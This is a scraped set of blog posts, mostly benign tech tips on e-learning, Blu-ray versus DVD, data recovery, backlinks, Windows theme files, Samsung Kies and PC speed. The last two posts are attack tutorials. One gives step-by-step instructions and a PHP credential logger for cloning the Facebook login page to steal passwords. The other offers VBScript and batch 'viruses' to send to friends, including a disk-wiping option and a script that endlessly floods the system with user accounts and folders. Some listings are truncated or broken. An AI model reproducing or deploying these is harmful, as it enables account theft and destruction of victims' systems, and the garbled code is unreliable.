How E- Learning Helps Students To Succeed More

How E- Learning Helps Students To Succeed More

In our modern age of information, e-learning has been the hottest topic of discussion owing to its popularity and reception among general public. E-Learning is nothing other than the addition of technology to the conventional way of education as it uses modern technology most prominently the ones that are mobile and internet based. One of the known instances is none other than Byju’s the learning app where they have been heard to use technology to an unparalleled level. There are immense benefits of using e-learning to sky rocket the learning of students. Below are 5 advantages or benefits that have helped e-learning cement its place in the field of modern day education.

Addresses the important learning issues of the student

The latest happenings in the field of technology like digital revolution and boom in the use of smartphones has resulted in radical transformations in the styles of consumption, discussion, content sharing and access of information technology by general public. Thus it has shifted the perception about learning in this manner. Since most people learn during the need of the hour, some of them likes to learn during the evenings and weekends while commuting to and from work. One of the key benefits of learning online is that it would ensure that you are well connected with learners at your level across the globe in a way that you want and at the time you want them. Bring your fellow learners on your side and gaining support from them while studying NCERT Books would be more than sufficient for you to get the desired results.

Quicker Delivery of Classes

The times are changing where people learn at a greater pace and e-learning does exactly that as class lectures are delivered back to back unlike the conventional class room for subjects based on CBSE Syllabus are conducted sequentially. This is where pioneers like Byju’s have been heard to deliver lectures in a video based format with animation themes that appeals to student’s imagination and have been heard to enchant them. There are various research findings stating that the e-learning reduces the learning time considerably like a minimum 25 to 60 per cent in comparison to learning by traditional ways. There are various reasons behind E-learning helping to reduce learning time like:

  • Learners decide the learning pace instead of the group leader.
  • Much easier to start and finish every learning session.
  • Learning possible from the comfort of your home and hence no need to travel.
  • Learners would be able to focus on the necessary training elements that they require and skip the sections they already know.

Apart from the factors mentioned above, there are other limitations which delays the learning process of students like the availability of classrooms, trainers and quickness of delivery.

Lesser Costs

Since the speed and ease at which e-learning would be delivered, the learning costs and need for increasing infrastructure are reduced to a considerable extent. A large amount of money could be saved from expenses like course materials, trainer salaries, and travel and accommodation costs for trainers.

Learning in a more cost effective manner

There are lot of case studies which show that providing e-learning courses to employees would improve their productivity and morale in such a way that it would have a positive impact on the profitability of the organisation.

Less impact on the environment

By creating an alternative to learning with books and magazines made of paper, it would do less harm to the environment compared to the traditional way of learning and thus reduces the carbon footprint by reducing the cutting down of trees in particular.

Thus the points mentioned above throws light on the fact on how students would greatly benefit from resorting to e learning as they validate the advantages of them to a great extent .

Difference between Blu Ray and DVD

Posted by Suhel Sayyad
Though we stay in a era of digital media, many users are still users of traditional DVD and BluRay systems. In todays article, we are going to present in front of you differences between a Blu Ray and a DVD. Blu-Ray uses a blue-violet laser as opposed to the red laser used on DVDs. This allows Blu-Ray discs to hold a lot more information on them than DVDs. This increase in the amount of information that can be stored on a disc allows you to put High-Definition movies on a disc and not run out of space, since the average HD movie will take up about 15-20 GB of space. If you have not seen an HD movie yet I would suggest stopping by your local Best Buy or Circuit City and looking at a Blu-Ray display. The images are sharper, brighter, and more detailed than any DVD movie. What manufacturers are trying to do is make the movie look as close to what you see in a real theater as possible, except for its a tenth the size and in your home.

Difference between Blu Ray Disc and DVD Disc

Blu-Rays cannot be played in a traditional DVD player, which means that you will eventually have to buy a blu-ray player. However, all blu-ray players can play DVDs, and they upscale the images to look better on an HD screen, up to 1080p. So, while you will have to get a new Blu-Ray player to play HD movies, you can still see all of your current DVDs on the same player, and they'll be enhanced. Blu-ray is essentially the next generation of DVD. A blu-ray disc looks like a regular DVD but must be played in a blu-ray player, not a regular DVD player. Blu-ray discs can hold much more data than regular DVDs, which makes them good for carrying movies in HD. If you don't have a HDTV yet, then don't worry about blu-ray. While you can use a blu-ray player with a regular TV, it won't look any better than your existing DVD player and DVDs. Even so, regular DVD is not going anywhere. Expect to see new releases on BOTH DVD and blu-ray for the foreseeable future. If you do decide to buy a blu-ray player, it will also play your existing DVDs - so you lose nothing by upgrading.

Laser Technology
Lasers are used in both media to read the information stored on the disc. As the disc spins the laser reads the information and transfers both picture and sound to the television.
  • DVD- DVD players use a red laser at 650nm wave length to read DVD discs. As the disc spins the laser reads the information encoded on the media and produces an image and sound on your television.
  • Blu-ray- Like the name suggests Blu-ray players use a blue laser to read the stored information. Blue laser wavelengths are shorter than the red at 405nm and are about two and a half times smaller in diameter than red lasers. This allows for closer and more precise reading of information stored on the disc.
Disc Construction
Physically, Blu-ray and DVD discs are identical. Both media have grooves or pits on their bottom layer than enables the laser to penetrate through and read the stored information.
  • DVD- Since DVDs are read with a red laser the grooves on its underside need to be wide enough to accommodate the larger wavelength. Because the grooves are so far apart only 4.7 GB of information can be stored on each layer of the disc. DVDs also include a protective layer designed to resist scratching.
  • Blu-ray- The grooves on a Blu-ray disc are much thinner and closer together because the blue laser used to read the disc has a shorter wave length and is two and a half times thinner than the red laser. This allows the Blu-ray disc to squeeze almost five times as many grooves on to a disc exactly the same size as a DVD. Blu-ray also includes a protective layer to prevent scratches. This protective layer is physically thinner than the one on a DVD, but it has a hard coating that makes it more scratch resistant.
In essence, Blu-Ray will replace DVD just as DVD replaced VHS and the CD replaced the Casette Tape.

Posted by Suhel Sayyad
Choosing a perfect template for your blog is too hard task, whether you want it for any platform such as Blogger or WordPress. Everyone like to make there blog look better and which there visitors also love, but not everyone can choose a perfect one. Also it is too important to choose a perfect template because no one likes a website which looks not good and also mainly visitors didn’t come back to such type sites, and for only that you may lost a new subscriber of your blog. So, in this article I will give you some tips to choose a perfect template for your blog.

Having a good design is important; and I think you may already know it but it is important to have good design but that must match with your blog niche. Always choose a template which looks same in every browser. Many templates are not looks much good with old Internet Explorer browsers so try to choose a template which should compatible from IE8 to newer, so it will make you sure that other browsers will show your website good. Choosing responsive template is also a good choice. Responsive sites mainly didn’t make visitors bored by scrolling because that template will fit in there computer, mobile or tablet PC’s screen, so it will lower your site’s bounce rate and also will increase your traffic. Everyone like fast websites, if any website load slowly than simply we close that and open another, and that is what your visitors can do. So, make sure that the template you are using is fast enough otherwise your site’s bounce rate will increase too high. The source from where you are going to download the template should be a trusted source because many of template providers put malicious codes which makes your blog slower and even can down your blog. I also recommend that you own create a template for your blog because that will be as your needs and also will suit your blog’s niche. You can use any framework to develop a template as that is easy for beginners and also good for professionals.

It is hard to find good templates for your Blogger blog due to lack of interest of designers towards Google's great blogging platform, still there are some great coders who put their time and efforts to develop high quality and feature rich templates for this platform also. Most of high quality Blogger templates are adapted from premium WordPress themes. Today, I've listed five high quality Blogger templates for your blog.

Steps to recover data from formatted drive using Recover My Drive utility

Posted by Suhel Sayyad 3 Comments
Step 1
Have the drive you want to recover attached to a computer with an operating system. In my case I simply had to plug the USB flash drive into my computer.

Step 2
Download and install the free version of Recover My Files. Don’t forget that you need to install it someplace other than the drive that you want to recover.

Step 3
Start Recover My Files. You have 4 general options.
The first two are for files that you accidentally deleted. Use the second two if you want to recover after a format. I chose Complete Format Recover and then clicked next.

Data Recovery - 1

Step 4
Next an information box comes up that tells you when to choose a physical drive and when to pick a logical one. The program tells you to choose a physical drive if you have simply reformatted, and choose a logical one if you have already installed something on the drive.
The logical version of the drives will show up with their normal names. The physical version will be numbered.
I chose physical number 1. You should never be choosing number 0 because that would mean you are trying to recover the main (boot) drive that you are running the program from. Click next.

Data Recovery - 2

Step 5
The next window asks you for the main types of files that you want to recover. It seems like the point of this step is simply to confuse you or worry you unnecessarily.
GetDataBack didn’t have a step like this. I’m sure it is for a very important super efficient algorithm. You don’t need to rack your brain trying to remember all of the file types you had on the disk. It assures you that all of your files will be recovered even if you don’t select all your file types.

Data Recovery - 3
Allow for about an hour to scan 50 GB of space or even longer if you are scanning via USB. The program will maintain a list of how many files found so far in the small window, and break down the list by file type in the left pane of the main window under the file type view.

Data Recovery - 4

Step 6
When the scan is done you see a list of all your recovered files.
In my case the files lost their names, but they open fine. You can preview them in the lower right part of the window. Click the check box on the files you want to save, or click the box next to the name of the drive to select all the files.

Data Recovery - 5

Step 7
Next, click the save button. If you only have a trial version, this will be the time when you will need to obtain and enter your license key.
Direct the program to save the files anywhere other than the drive you recovered. Once your files are saved you can close the Recover My Files Program.

BackLinks: An Important Factor to improve Website Ranking for making good business

Posted by Suhel Sayyad 5 Comments

A link is a connection between any two web pages. You might have internal links between different pages on your site or external links that point from your site to other useful web resources. Links that go from another site to yours are called backlinks because they point back to your pages. Backlinks are also one way that Google determines PageRank in order to assess the popularity of a website. Inbound links were originally important (prior to the emergence of search engines) as a primary means of web navigation however today their significance lies in search engine optimization (SEO).
Websites often use various search engine optimization (SEO) techniques to increase the number of backlinks pointing to their website. Some methods are free for use by everyone whereas some methods, like linkbaiting, require quite a bit of planning and marketing to work.
From a search engine optimization perspective, links demonstrate a site's popularity. Essentially, every time a site links to your pages, it's saying that it finds them worthy of sharing with its readers. When search engine spiders find a site with lots of other sites pointing to it, they conclude that the site provides quality information that should be rewarded with high rankings.
So for starters, do you really know how many backlinks your website carries. Here is the solution to check the same. You can log on to

Boost Backlink Tips

  • Exchange links to your website with others. List them on your links page in exchange for them linking to you.
  • Article submissions. Writing articles in your area of expertise or about topics of interest are a great way to create backlinks. This is what I personally feel.
  • Social sites (Facebook, Twitter and Google+) and social bookmarking are also great ways to create backlinks, and it doesn’t have to be time consuming. Applications like Hootsuite allow you to propagate multiple sites.
  • Video submission sites are another manner in which to generate backlinks to your site and your uploaded videos

Create own Theme in Windows

Posted by Suhel Sayyad 3 Comments
Windows customization isn’t anything new, but with Windows 7, customization got a lot easier with theme packs. Here is how you can create your own theme pack from scratch.
Creating a theme pack from scratch is a lot more work than using built in tools, but it gives you a lot more flexibility by allowing you to creating brand icons, RSS background feeds, and customizing every feature which may not be easy to do through Windows native tools. When you are going to create a theme that you can share with others you will want to take into account what exactly you will be able to change that others will be able to use. Windows 7 theme packs allow you to customize the desktop background (including “slide show” backgrounds, and RSS feed backgrounds), screen saver, system sounds, desktop icons, mouse pointers, and system colors.

Customize your theme

Start the theme pack by gathering all the files you want to use for your customization. Remember to get items for every part you are going to customize. If you do not specify parts to theme, the system will use the defaults that come with windows. So if you don’t find a mouse cursor you like, Windows will use the default cursor for the system. Once you have the files you want, put them all in a folder that you can easily get to. I am going to be building a theme based on the Matrix wallpapers.
We will start the customization by generating the .theme file. This file is the heart of your theme pack and will tell Windows which media file to use where. The .theme file is really just a specially formatted text file so start by right clicking in your folder and creating a new text document. Name the file whatever you want and open it with your favorite text editor.
The .theme file is going to be broken up into sections. The first section is the [Theme] section. The [Theme] section only has two options, the theme display name, and the theme icon. The display name can be whatever you want the theme to be called in the control panel > personalize window, and the icon graphic must be a PNG file. The graphic will be scaled to 80×240 so use something close to that resolution or ratio.
Note: The theme icon will only show up under the Control Panel > Personalization window so don’t worry if you don’t see the icon.
The rest of the [Theme] section will tell windows which icons to use for the desktop icons (Computer, Documents, Recycle Bin, Network). For icon files you can use either standalone .ico files, or you can use icons embedded in .exe or .dll files also. For .exe and .dll files you need to specify which icon to use with a comma and then say which icon you are going to use. (my.exe,0 or my.dll,-50). Each desktop item has a unique screen that identifies it so make sure you use the right string for each item.
Computer = [CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon]
Documents = [CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\DefaultIcon]
Network = [CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\DefaultIcon]
Recycle Bin = [CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon
Below each item you will specify the icon with DefaultValue except the Recycle Bin which will use values Full and Empty.
After the [Theme] section is the optional [Control Panel\Colors] and [Control Panel\Cursors] sections. The colors section would be extremely hard to adjust manually but if you really want to try it you can adjust the following items using RGB codes.
Note: RGB codes range from 0-255 and are separated by spaces. So black is 0 0 0 and white is 255 255 255.
ActiveTitle, Background, Hilight, HilightText, TitleText, Window, WindowText, Scrollbar, InactiveTitle, Menu, WindowFrame, MenuText, ActiveBorder, InactiveBorder, AppWorkspace, ButtonFace, ButtonShadow, GrayText, ButtonText, InactiveTitleText, ButtonHilight, ButtonDkShadow, ButtonLight, InfoText, InfoWindow, GradientActiveTitle,
Instead of doing this section by hand you could also adjust the colors using the control panel > personalize > colors, and then save the theme file and then just copy and paste the colors section into the theme you want.
The [Control Panel\Cursors] section has an option for which .cur or .ani files you want to use for each cursor. The valid cursors you can replace are the following:
Arrow, Help, AppStarting, Wait, NWPen, No, Size, SizeWE, Crosshair, IBeam, SizeNWSE, SizeNESW, SizeAll, UpArrow
If not cursor is defined the system defaults will be used.
After these two sections comes the first mandatory section and that is the [Control Panel\Desktop] section. If you do not have this part of the file the theme will not be recognized as a valid theme. In here you will specify what the wallpaper image will be, how the image will be displayed and if the image is tiled or not. The three values you need are Wallpaper, TileWallpaper, and WallpaperStyle.
Wallpaper can be a .bmp, .gif, .jpg, .png, or .tif file. TileWallpaper is either a 1 or 0; 1 indicates the wallpaper should be tiled while 0 disables the tile. WallpaperStyle can be the following values. 0 means the image is centered, 2 means the image is stretched, 6 will fit the image to the screen, or 10 will will resize and crop the image to fit the screen.
After you have the [Control Panel\Desktop] section defined you can move on to the next optional section [Slideshow]. [Slideshow] is how you can make rotating backgrounds for Windows 7. This section has the following attributes: Interval, Shuffle, RSSFeed, ImagesRootPath, Item*Path (* represents which pictures will be included in the slide show). The attributes can be defined with the following values: Interval shows the amount of time to wait before changing the wallpaper image (in milliseconds), Shuffle is a 1 or 0 to determine if images are displayed in alphabetical order or shuffled, RSSFeed points to the URL of the images RSS feed you want to use, ImagesRootPath is the folder containing your images, and Item*Path determines how many items are included in the slideshow. Each Item*Path entry points to one wallpaper image so you need to specify each image manually.
Note: ImagesRootPath and RSSFeed cannot be used together.
Following [SlideShow] is another optional section called [Metrics]. [Metrics] section shows dimensions of various display elements, such as the window border width, icon height, or scrollbar width. The NonclientMetrics and IconMetrics values are binary structures defined by NONCLIENTMETRICS and ICONMETRICS in winuser.h. In other words, you probably don’t want to edit this section by hand. If you are going to change the value of any window boarders I would suggest doing that through the control panel and saving the modified theme. Then export the [Metrics] section into your desired theme. Non-the-less, here is an example of a [Metrics] section.
Next is the required [VisualStyles] section. This section allows you to point to a .msstyles file that can be modified for customization. If you use a .msstyles value in this section you will need to remove the [Metrics] and [Color] sections of your theme because the .msstyles will replace both of those sections.  The valid attributes are Path, Color, Composition, Size, ColorizationColor, and Transparancy. These options makes it easier to customize an already existing theme. For example, if you set the path attribute to %SystemRoot%\resources\Themes\Aero\Aero.msstyles you can easily begin customizing the default Windows Aero theme.
Following [VisualStyles] is the optional [Sounds] and [AppEvents] sections. For this section you can either specify each sound manually by using the path to a .wav file like so:
Or you can specify one of the built in sound schemes with
You can use one of the built in sound schemes or specify the .dll file containing the theme.
Following [Sounds] is the [Boot] section. The [Boot] section only has one value for SCRNSAVE.EXE point this value to whatever .scr file you want to use for your screensaver.
Finally is the required [MasterThemeSelector] which only has one attribute and you don’t have a choice for the value. The only thing that goes in this section is MTSM=DABJDKT which indicates that the theme is valid.
Once you have all of the required and optional sections in the file, save the file to whatever you want to call it and change the extension from .txt to .theme. Make sure you are viewing known file extensions when changing the extension otherwise the true extension will be hidden.

Packaging your theme pack

The final step it to package all of your media into a .themepack file. The .themepack file is simply a .cab file with an extension change. So if you already have software that can create a .cab file, simply use that software to compress your theme folder with all of your media in it and change the extension. If you don’t already have a cab packing program you can check out CabPack which is freeware.
Here’s an example of the Matrix Theme we built from scratch.

Once you have your theme pack you can apply it to your own system before sharing it. If there is anything else that needs tweaking you can either go back and change it in your .theme file your you can change it through the Windows GUI and then re-save the theme for sharing. Now go out there and share your favorite theme tweaks with the rest of the world.

Kies: Back up your Samsung Android Phone

Posted by Suhel Sayyad
Creating regular back ups of your smartphone, is an essential task for a number of reasons. You first have a safe copy of the data on another device that you can not only restore on the phone the data was originally backed up from, but also on other phones and even software applications. It also means that you still have access to data such as contacts, messages or your calendar even if your phone gets damaged or stolen.
Kies is the official Samsung software to handle this task. It can be used for other purposes as well, like updating the firmware of your Android phone or synchronizing data whenever the phone is connected to the PC via cable connection or wireless connection.

Back up your Samsung Android phone

The first thing that you need is the Samsung Kies software. You can download the program from the official Samsung website where versions for Microsoft Windows PCs and Apple Macintosh systems are offered.
The program picks up phone connections to the PC or Mac automatically and lists them under Connected Devices in the interface. You can use that option to browse data like music, contacts or photos on the phone directly without having to transfer the data first.
backup samsung android smartphone
To backup the phone select the phone from the list of devices connected to the PC. You should see four tabs on the right which handle various phone related features.
  • Basic information displays the free and used memory of the phone, the installed and latest firmware and options to enable automatic synchronization of date, transfers of back up date from non Samsung phones to the smartphone or tablet, and whether photos should be optimized automatically for device transfers.
  • Sync displays the information and data that you can synchronize with the PC or Mac. Personal information include contacts, the schedule and to do list. Note that you cannot sync other data like messages for instance.
  • Import and export enables you to transfer data from the PC to the device, data that is on a device to the PC, or date from one Android device to another directly.
  • Back up and restore is the feature we are looking for. Here you can select the Android items that you want to back up to the PC.
samsung android backup

The following items can be backed up to the PC:

  1. Contacts
  2. Schedule
  3. To do
  4. Messages
  5. S Note
  6. Call log
  7. Music
  8. Photos
  9. Videos
  10. Miscellaneous content files
  11. Preferences and ringtones
  12. Network settings and bookmarks
  13. Email account information
Click on the back up button on the screen once you have made the selection. A small overlay window pops up that displays the progress of the backup. Note that the processing time depends on a number of factors, including the used storage on the phone, the data connection between PC and Android device, and the PC itself. Make sure you keep the phone connected to the computer during the backup to avoid that the process is interrupted.
samsung phone backup

Restore a previously created backup

To restore a previously created backup click on the restore button on the same tab. Note that all existing date on the phone will be replaced by the backup and that running apps may be forcefully closed by the process.
You are then asked to select the backup that you want to restore. All backups found in the default location are automatically displayed, but you can load other backups with a click on the find file button here. It is recommended to compare date and time if you have multiple backups to make sure the correct backup is restored.
You can then select the items that you want to restore. You can restore all of them or only select items.

Things to consider

Samsung Kies can't be configured to create automatic backups of the Android device whenever it is connected to the PC.. The only backup-like feature that is automatic is the synchronization option, but that cannot be used to sync all data that is on the phone.

Hike: Good Messaging App for Android

Posted by Suhel Sayyad
Instant messaging (IM) has become a trend these days especially with the youth. A trend, pioneered by the immensely popular WhatsApp IM application, others like Nimbuzz and Samsung's proprietary ChatON messenger are trying to follow suit as well.

The latest entrant in this genre is Hike, a communication app that offers both instant messaging and SMS under one roof. Developed by Bharti Softbank, a 50-50 partnership between India's Bharti Telecom and Japan's Softbank telecom provider, the app is the brainchild of Kavin Bharti Mittal.

Hike offers messaging in three different ways. Hike-to-Hike messaging with other phones is unlimited and free worldwide. Second, you can communicate with other smartphone users who don't have Hike via SMS, which is only restricted to India at the moment. Finally, you can message any other phone user via SMS. But beware, if you constantly bug another user with Hike, they are given a code that they can use to block you.

On the bright side, each Hike user gets 100 Free Hike SMS every month to message those friends who aren't on Hike., which gets replenished each month and in case any friend joins the app on your request via SMS, you get 10 Free SMS extra and the company will also be awarding each user with 50 free SMS per month for each friend they have invited to Hike. Other ways of inviting friends are through Facebook, Twitter and email.

hike-rewards.jpgThe user interface of Hike is very clean, simple and basic with pleasant hues of white and blue. Once you've downloaded the app, you'll be prompted to enter your mobile number. While the iOS version sends a 6-digit verification code via SMS that expires within a minute (reminiscent of Google Authenticator), the Android version simply greets you to the welcome screen asking you to enter your name and complete the registration. This is then followed by a tutorial of the app's basics.

Also, as soon as you enter the app, an Inbox message welcomes you with a reward of Rs.10. Every time you successfully invite a friend via SMS you earn credit of an additional Rs.20. In order for you to earn rewards, your friends must download and activate the app soon after you invite them.
Using the app is fairly simple. The app smoothly integrates your entire existing phone contacts. You can access various menu options such as Home, Invite Friends, Free Messaging and more by swiping left. Swiping right reveals Search bar along with Favourites and Friends on Hike.
Once you send a message you can see sent (S), delivered (D), read and typing (...) notifications, similar to WhatsApp, which has a different notification convention. Apart from the standard Emojis on your device, Hike has its own set of emoticons for variety.

10 tips to increase computer performance

Posted by Suhel Sayyad

Use a free software web browser

Not only are they considered more secure because it is open source, therefore anyone can help develop and fix it, it is also more obscure in general than the very popular Internet Explorer.

Clean corrupt windows registry this has a significant impact on computers' speed.

 Intel Software and Partner Directory is a good place to select such cleaners. Other sites sources for different software selection are CNET, TuCows etc

 Defragment your hard drive every one to two weeks

This tool can usually be found by right clicking a hard drive on "My Computer" and clicking on "Properties." Then click the tab "Tools."

Some applications install things on your computer that make it run slower

Things such as having hundreds of fonts will make it load slower. Spyware and Ad-Ware will also make your computer run slower so get a good spyware cleaner like Spyware Doctor, AVG etc. Some anti-virus programs although needed for a Windows computer will slow down your computer (but it is very risky to use internet without security).

Try not to change in-depth system preferences

This can cause unexpected results. If you do change them and do not like the results and cannot undo them, execute "System Restore." It is much like a time machine for your computer. There are three different ways to execute this program:

  • Open "My Computer" and click "Control Panel." There should be a "System Restore" somewhere.
  • Click your start button. Then choose "All Programs." Then go to "Accessories." Lastly, choose "System Tools." There should the be a "System Restore."
  • In case it is not in both places stated above, it is then in this file directory: "C:/WINDOWS/system32/Restore" with the executable named "rstrui." This is only available in Windows XP, as far as I know.

If you have a lot of videos or music, keep them organized

Also, keeping them all loaded in programs such as Winamp may cause your computer to run more slowly.

Clear your e-mail in box regularly

This helps a bit, but only on Thunderbird, MS Outlook or other E-Mail clients that save stuff to your hard drive; with webmail such as Yahoo Mail it will make no difference.

Don't use a huge graphic picture as your background wallpaper

This makes your computer to work a lot harder to paint this again and again on desktop background. It's the same as trying to load a large digital picture; it takes forever, at least for slower computers.

Change the computer theme to "Windows-Standard" (Start > Control Panel > Screen and desktop > Themes)

Change the computers desktop to none, and change the color to black or some other basic color

(Start > Control Panel > Screen and Desktop > Desktop)

Hacking Facebook account with Phishing

Posted by Suhel Sayyad 11 Comments
After reading my previous blog on protecting the folders without softwares and writing simple virus, I found my readers more to hear from me in the field of Networking security. So, today I will tell you about the famous hacking technique called “Phishing“.

In this technique hackers just make a fake page of any website to hack user account , then if user enter's his account name and password hacker get the account details and hack the account of user.
Before starting I just want to tell you the this information is for only knowledge and it should not be made use in practical. Any such mischief done, the developer would be sole responsible for the same.

I will tell you how to create phishing pages for facebook.

Steps to create a phishing page of facebook:======
1. First goto Facebook login page (make sure that the page is loaded completely) and right click and select view source (in firefox) or view source code option in other browsers.
2. Select all ( CTR + A ) and copy all the code and paste it in notepad.
3. Then search(CTR + F) for the keyword action.You can see the code as given below.

4. Just change the above code as mentioned below
after changing to pass.php (or anyname.php) just save it in the form facebook.html (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.
5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "

Note:‘‘ is the redirection url,When victim will enter his/her email and password he will redirected to’
6. By this step our PHP script is also ready,
7. Now host these 2 files ie,
in any of free hosting servers like ripway,drivehq,110 mb or phishing-site.www etc (or any other,just google free hosting).Make sure that these 2 files are in same directory.
8. After hosting you will get a direct link to your phishing page,that is to your facebook.html page.just use this link to access or send phishing page.
9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there.

How to Make Simple but Irritating Viruses

Posted by Suhel Sayyad
Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 5000

Save it as "Anything.VBS" and send it.

Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

Save it as "Anything.VBS" and send it.

Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"

Save it as "Anything.VBS" and send it.

Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can't be detected by any antivirus

Here are some good viruses ,i am not responsible for any kind of damage to your system ... :)
  • Copy this to notepad and save as flood1.bat.....

GOTO start

@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

CD %HomeDrive%\
SET lisa=1
GOTO flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1

wat does it do : this is an extremely harmful virus the will keep replicating itself until your harddrive is totally full and will destroy ur comp.
